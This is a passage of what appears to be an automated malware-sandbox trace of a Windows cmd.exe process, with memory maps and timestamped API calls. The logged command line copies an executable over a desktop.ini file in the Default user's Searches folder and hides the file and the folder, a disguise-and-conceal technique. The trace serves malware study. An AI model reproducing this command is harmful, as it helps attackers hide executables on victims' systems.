"\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32273 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32274 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32275 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32276 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32277 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32278 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32279 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 32280 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32281 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 32282 
start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 32283 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 32284 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 32285 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 32286 start_va = 0x2d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 32287 start_va = 0x500000 end_va = 0x662fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 32288 start_va = 0x6c0000 end_va = 0x12bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 32289 start_va = 0x12c0000 end_va = 0x158efff entry_point = 0x12c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 754 os_tid = 0xb78 [0216.661] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfb1c | out: lpSystemTimeAsFileTime=0x2cfb1c*(dwLowDateTime=0xb5efd740, dwHighDateTime=0x1d440a9)) [0216.661] GetCurrentProcessId () returned 0x40c [0216.661] GetCurrentThreadId () returned 0xb78 [0216.661] GetTickCount () returned 0x3c995 [0216.661] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfb14 | out: lpPerformanceCount=0x2cfb14*=27344994537) returned 1 [0216.661] GetModuleHandleA (lpModuleName=0x0) returned 0x4a350000 [0216.661] __set_app_type (_Type=0x1) [0216.661] __p__fmode () returned 0x76b331f4 [0216.661] __p__commode () returned 0x76b331fc [0216.661] 
SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a3721a6) returned 0x0 [0216.662] __getmainargs (in: _Argc=0x4a374238, _Argv=0x4a374240, _Env=0x4a37423c, _DoWildCard=0, _StartInfo=0x4a374140 | out: _Argc=0x4a374238, _Argv=0x4a374240, _Env=0x4a37423c) returned 0 [0216.662] GetCurrentThreadId () returned 0xb78 [0216.662] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb78) returned 0x38 [0216.662] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0216.662] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0216.662] SetThreadUILanguage (LangId=0x0) returned 0x409 [0216.662] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0216.662] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfaac | out: phkResult=0x2cfaac*=0x0) returned 0x2 [0216.662] VirtualQuery (in: lpAddress=0x2cfae3, lpBuffer=0x2cfa7c, dwLength=0x1c | out: lpBuffer=0x2cfa7c*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0216.662] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfa7c, dwLength=0x1c | out: lpBuffer=0x2cfa7c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0216.662] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfa7c, dwLength=0x1c | out: lpBuffer=0x2cfa7c*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0216.662] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cfa7c, dwLength=0x1c | out: lpBuffer=0x2cfa7c*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) 
returned 0x1c [0216.663] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfa7c, dwLength=0x1c | out: lpBuffer=0x2cfa7c*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0216.663] GetConsoleOutputCP () returned 0x1b5 [0216.663] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a374260 | out: lpCPInfo=0x4a374260) returned 1 [0216.663] SetConsoleCtrlHandler (HandlerRoutine=0x4a36e72a, Add=1) returned 1 [0216.663] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.663] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0216.663] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.663] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a3741ac | out: lpMode=0x4a3741ac) returned 1 [0216.663] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.663] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0216.663] _get_osfhandle (_FileHandle=0) returned 0x3 [0216.663] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a3741b0 | out: lpMode=0x4a3741b0) returned 1 [0216.663] _get_osfhandle (_FileHandle=0) returned 0x3 [0216.663] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0216.664] GetEnvironmentStringsW () returned 0x410418* [0216.664] FreeEnvironmentStringsW (penv=0x410418) returned 1 [0216.664] GetEnvironmentStringsW () returned 0x410418* [0216.664] FreeEnvironmentStringsW (penv=0x410418) returned 1 [0216.664] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cea1c | out: phkResult=0x2cea1c*=0x40) returned 0x0 [0216.664] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cea24, lpData=0x2cea28, lpcbData=0x2cea20*=0x1000 | out: lpType=0x2cea24*=0x0, lpData=0x2cea28*=0xc8, lpcbData=0x2cea20*=0x1000) returned 0x2 [0216.664] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cea24, 
lpData=0x2cea28, lpcbData=0x2cea20*=0x1000 | out: lpType=0x2cea24*=0x4, lpData=0x2cea28*=0x1, lpcbData=0x2cea20*=0x4) returned 0x0 [0216.664] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cea24, lpData=0x2cea28, lpcbData=0x2cea20*=0x1000 | out: lpType=0x2cea24*=0x0, lpData=0x2cea28*=0x1, lpcbData=0x2cea20*=0x1000) returned 0x2 [0216.664] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cea24, lpData=0x2cea28, lpcbData=0x2cea20*=0x1000 | out: lpType=0x2cea24*=0x4, lpData=0x2cea28*=0x0, lpcbData=0x2cea20*=0x4) returned 0x0 [0216.664] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cea24, lpData=0x2cea28, lpcbData=0x2cea20*=0x1000 | out: lpType=0x2cea24*=0x4, lpData=0x2cea28*=0x40, lpcbData=0x2cea20*=0x4) returned 0x0 [0216.664] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cea24, lpData=0x2cea28, lpcbData=0x2cea20*=0x1000 | out: lpType=0x2cea24*=0x4, lpData=0x2cea28*=0x40, lpcbData=0x2cea20*=0x4) returned 0x0 [0216.664] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cea24, lpData=0x2cea28, lpcbData=0x2cea20*=0x1000 | out: lpType=0x2cea24*=0x0, lpData=0x2cea28*=0x40, lpcbData=0x2cea20*=0x1000) returned 0x2 [0216.664] RegCloseKey (hKey=0x40) returned 0x0 [0216.664] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cea1c | out: phkResult=0x2cea1c*=0x40) returned 0x0 [0216.664] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cea24, lpData=0x2cea28, lpcbData=0x2cea20*=0x1000 | out: lpType=0x2cea24*=0x0, lpData=0x2cea28*=0x40, lpcbData=0x2cea20*=0x1000) returned 0x2 [0216.664] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cea24, lpData=0x2cea28, lpcbData=0x2cea20*=0x1000 | out: lpType=0x2cea24*=0x4, 
lpData=0x2cea28*=0x1, lpcbData=0x2cea20*=0x4) returned 0x0 [0216.664] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cea24, lpData=0x2cea28, lpcbData=0x2cea20*=0x1000 | out: lpType=0x2cea24*=0x0, lpData=0x2cea28*=0x1, lpcbData=0x2cea20*=0x1000) returned 0x2 [0216.664] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cea24, lpData=0x2cea28, lpcbData=0x2cea20*=0x1000 | out: lpType=0x2cea24*=0x4, lpData=0x2cea28*=0x0, lpcbData=0x2cea20*=0x4) returned 0x0 [0216.664] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cea24, lpData=0x2cea28, lpcbData=0x2cea20*=0x1000 | out: lpType=0x2cea24*=0x4, lpData=0x2cea28*=0x9, lpcbData=0x2cea20*=0x4) returned 0x0 [0216.664] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cea24, lpData=0x2cea28, lpcbData=0x2cea20*=0x1000 | out: lpType=0x2cea24*=0x4, lpData=0x2cea28*=0x9, lpcbData=0x2cea20*=0x4) returned 0x0 [0216.665] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cea24, lpData=0x2cea28, lpcbData=0x2cea20*=0x1000 | out: lpType=0x2cea24*=0x0, lpData=0x2cea28*=0x9, lpcbData=0x2cea20*=0x1000) returned 0x2 [0216.665] RegCloseKey (hKey=0x40) returned 0x0 [0216.665] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b2 [0216.665] srand (_Seed=0x5b8863b2) [0216.665] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\Searches\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\Searches\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\Searches\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Searches\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Searches\"" [0216.665] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\Searches\\desktop.ini\" & del /f /q 
\"C:\\Users\\Default\\Searches\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\Searches\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Searches\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Searches\"" [0216.665] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a375260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0216.665] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x411b78, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0216.665] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0216.665] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0216.665] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0216.665] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0216.665] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0216.665] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0216.665] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0216.665] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0216.665] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0216.665] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0216.666] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0216.666] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0216.666] GetEnvironmentStringsW () returned 0x412568* [0216.666] FreeEnvironmentStringsW (penv=0x412568) returned 1 [0216.666] GetEnvironmentVariableW (in: lpName="COMSPEC", 
lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.666] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0216.666] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0216.666] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0216.666] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0216.666] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0216.666] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0216.666] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0216.666] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0216.666] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0216.666] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf7e8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0216.666] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf7e8, lpFilePart=0x2cf7e4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf7e4*="Desktop") returned 0x18 [0216.666] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0216.666] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf564 | out: lpFindFileData=0x2cf564) returned 0x410bf8 [0216.666] FindClose (in: hFindFile=0x410bf8 | out: hFindFile=0x410bf8) returned 1 [0216.666] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf564 | out: lpFindFileData=0x2cf564) returned 0x410bf8 [0216.667] FindClose (in: hFindFile=0x410bf8 | out: hFindFile=0x410bf8) returned 1 [0216.667] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf564 | out: lpFindFileData=0x2cf564) returned 0x410bf8 [0216.667] FindClose (in: hFindFile=0x410bf8 | out: hFindFile=0x410bf8) returned 1 [0216.667] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0216.667] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0216.667] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0216.667] GetEnvironmentStringsW () returned 0x410418* [0216.667] FreeEnvironmentStringsW (penv=0x410418) returned 1 [0216.667] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a375260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0216.667] GetConsoleOutputCP () returned 0x1b5 [0216.668] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a374260 | out: lpCPInfo=0x4a374260) returned 1 [0216.668] GetUserDefaultLCID () returned 0x409 [0216.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a374950, cchData=8 | out: lpLCData=":") returned 2 [0216.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf928, cchData=128 | out: lpLCData="0") returned 2 [0216.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf928, cchData=128 | out: lpLCData="0") returned 2 [0216.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf928, cchData=128 | out: lpLCData="1") returned 2 [0216.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a374940, cchData=8 | out: lpLCData="/") returned 2 [0216.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a374d80, cchData=32 | out: lpLCData="Mon") returned 4 [0216.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a374d40, cchData=32 | out: lpLCData="Tue") returned 4 [0216.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a374d00, cchData=32 | out: lpLCData="Wed") returned 4 [0216.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a374cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0216.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a374c80, cchData=32 | out: lpLCData="Fri") 
returned 4 [0216.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a374c40, cchData=32 | out: lpLCData="Sat") returned 4 [0216.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a374c00, cchData=32 | out: lpLCData="Sun") returned 4 [0216.668] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a374930, cchData=8 | out: lpLCData=".") returned 2 [0216.668] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a374920, cchData=8 | out: lpLCData=",") returned 2 [0216.668] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0216.669] GetConsoleTitleW (in: lpConsoleTitle=0x400a70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.669] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0216.669] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0216.669] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0216.669] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0216.670] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0216.670] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0216.670] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0216.670] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0216.670] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0216.670] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0216.670] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0216.672] _wcsicmp (_String1="del", _String2=")") returned 59 [0216.672] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0216.672] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0216.672] _wcsicmp (_String1="IF", _String2="del") returned 5 [0216.672] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0216.672] _wcsicmp (_String1="REM", _String2="del") returned 14 [0216.672] _wcsicmp (_String1="REM/?", 
_String2="del") returned 14 [0216.673] _wcsicmp (_String1="type", _String2=")") returned 75 [0216.674] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0216.674] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0216.674] _wcsicmp (_String1="IF", _String2="type") returned -11 [0216.674] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0216.674] _wcsicmp (_String1="REM", _String2="type") returned -2 [0216.674] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0216.676] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0216.676] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0216.677] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0216.677] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0216.677] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0216.677] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0216.726] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0216.726] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0216.730] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0216.731] FindClose (in: hFindFile=0x4124e8 | out: hFindFile=0x4124e8) returned 1 [0216.731] FindClose (in: hFindFile=0x4124e8 | out: hFindFile=0x4124e8) returned 1 [0216.732] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0216.732] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0216.732] GetConsoleTitleW (in: lpConsoleTitle=0x2cf350, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.732] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cf1d8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cf2a0 | out: lpAttributeList=0x2cf1d8, lpSize=0x2cf2a0) 
returned 1 [0216.732] UpdateProcThreadAttribute (in: lpAttributeList=0x2cf1d8, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cf298, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cf1d8, lpPreviousValue=0x0) returned 1 [0216.732] GetStartupInfoW (in: lpStartupInfo=0x2cf194 | out: lpStartupInfo=0x2cf194*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0216.732] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0216.733] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\Default\\Searches\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2cf234*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\Default\\Searches\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cf280 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\Default\\Searches\\desktop.ini\" ", lpProcessInformation=0x2cf280*(hProcess=0x50, hThread=0x4c, dwProcessId=0x170, dwThreadId=0xbcc)) returned 1 [0216.739] CloseHandle (hObject=0x4c) returned 1 [0216.739] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0216.739] GetEnvironmentStringsW () returned 0x410838* [0216.739] FreeEnvironmentStringsW (penv=0x410838) returned 1 [0216.739] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0216.864] 
GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2cf174 | out: lpExitCode=0x2cf174*=0x0) returned 1 [0216.864] CloseHandle (hObject=0x50) returned 1 [0216.864] _vsnwprintf (in: _Buffer=0x2cf2bc, _BufferCount=0x13, _Format="%08X", _ArgList=0x2cf180 | out: _Buffer="00000000") returned 8 [0216.864] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0216.864] GetEnvironmentStringsW () returned 0x412558* [0216.864] FreeEnvironmentStringsW (penv=0x412558) returned 1 [0216.864] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0216.864] GetEnvironmentStringsW () returned 0x412558* [0216.864] FreeEnvironmentStringsW (penv=0x412558) returned 1 [0216.864] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cf1d8 | out: lpAttributeList=0x2cf1d8) [0216.864] GetConsoleTitleW (in: lpConsoleTitle=0x2cf558, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.865] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Searches\\desktop.ini" (normalized: "c:\\users\\default\\searches\\desktop.ini")) returned 0x20 [0216.865] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Searches" (normalized: "c:\\users\\default\\searches")) returned 0x11 [0216.866] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0216.866] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0216.866] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Searches\\desktop.ini" (normalized: "c:\\users\\default\\searches\\desktop.ini")) returned 0x20 [0216.866] FindNextFileW (in: hFindFile=0x412c78, lpFindFileData=0x4135e4 | out: lpFindFileData=0x4135e4) returned 0 [0216.867] GetLastError () returned 0x12 [0216.867] FindClose (in: hFindFile=0x412c78 | out: hFindFile=0x412c78) returned 1 [0216.868] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0216.868] GetConsoleTitleW (in: lpConsoleTitle=0x2cf4f4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.869] 
